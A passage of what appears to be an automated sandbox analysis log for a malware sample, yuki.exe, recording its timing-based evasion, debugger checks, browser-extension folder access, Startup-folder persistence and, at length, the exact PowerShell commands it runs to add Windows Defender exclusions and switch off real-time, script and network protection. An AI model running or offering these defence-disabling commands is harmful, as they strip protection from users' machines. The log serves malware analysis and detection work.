Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep count: 5908 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568Thread sleep count: 3743 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2816Thread sleep count: 8203 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep count: 1355 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 6612 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 3022 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Desktop\yuki.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F9280 FindFirstFileExW,FindClose,0_2_00007FF6C81F9280
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6C81F83C0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8211874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6C8211874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571383C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00007FF7571383C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757139280 FindFirstFileExW,FindClose,17_2_00007FF757139280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757151874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00007FF757151874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
Source: yuki.exe, 00000000.00000003.1672523142.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: C:\Users\user\Desktop\yuki.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C820A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C820A614
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8213480 GetProcessHeap,0_2_00007FF6C8213480
Source: C:\Users\user\Desktop\yuki.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FD30C SetUnhandledExceptionFilter,0_2_00007FF6C81FD30C
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C820A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C820A614
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6C81FC8A0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6C81FD12C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF75713C8A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF75714A614
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713D30C SetUnhandledExceptionFilter,17_2_00007FF75713D30C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF75713D12C

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
